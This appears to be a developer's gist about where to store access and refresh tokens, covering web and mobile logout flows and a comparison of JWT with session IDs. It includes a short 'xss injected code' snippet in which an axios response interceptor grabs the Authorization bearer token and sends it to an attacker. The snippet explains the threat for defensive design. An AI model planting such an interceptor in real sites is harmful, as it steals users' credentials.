@srghma
Created October 22, 2020 14:04
Storing access token/refresh token

First, refresh tokens:

I would also add that:

  • on web, storing the access token in memory is not 100% safe either (maybe)

because, suppose our site was XSSed: a malicious user (MU) could find a way to sniff your token

// your code
// (header name is Authorization, not Authentication; a JWT goes in a Bearer scheme, not Basic)

let jwtAccessTokenRef = null

axios.interceptors.request.use((config) => {
  config.headers.Authorization = `Bearer ${jwtAccessTokenRef}`
  return config
})

// xss injected code
// every axios response carries the config it was sent with, including the
// Authorization header your interceptor added, so the attacker never has to
// touch jwtAccessTokenRef itself

axios.interceptors.response.use((response) => {
  send(response.config.headers.Authorization) // send(): attacker's exfiltration, e.g. fetch() to their server
  return response
})

Web vs mobile UX flows

on web we may want:

  • session with static expiration - log out 7 days after the first login
  • rolling session - log out 1 day after the last request

on mobile:

  • we don't want to log out EVER
  • BUT IF the mobile phone was stolen - we want to have a page on the web where we forget this mobile phone
  • OR IF the password was changed - log out (maybe)

access token (AT) / refresh token (RT) - where did they come from?

The AT/RT approach came from OAuth.

The AT is a cached, short-lived (e.g. valid for 15 min) result of the expensive validation of the RT (long-lived, e.g. 7d).

By this I mean:

  • WHEN on /refresh-access-token, the client exchanges the old RT and gets a new AT and a new RT
  • BEFORE THIS, the security provider can check whether the user_id in the RT is blacklisted/whitelisted

JWT AT/RT vs JWT session-id-like approach

On the web it's better to use:

https://imgur.com/a/K78R1fj

(found in this comment: hasura/graphql-engine#2205 (comment))

On the web, it's better to use a session-id, unless:

  • you want speed and don't want to make a DB request
  • you are using a 3rd-party security provider (Auth0)
  • you are using a microservice (e.g. a 3rd-party file server) and you don't want it to make requests to the security provider

What are other possible clients?

bonus: on the web, we want to log out
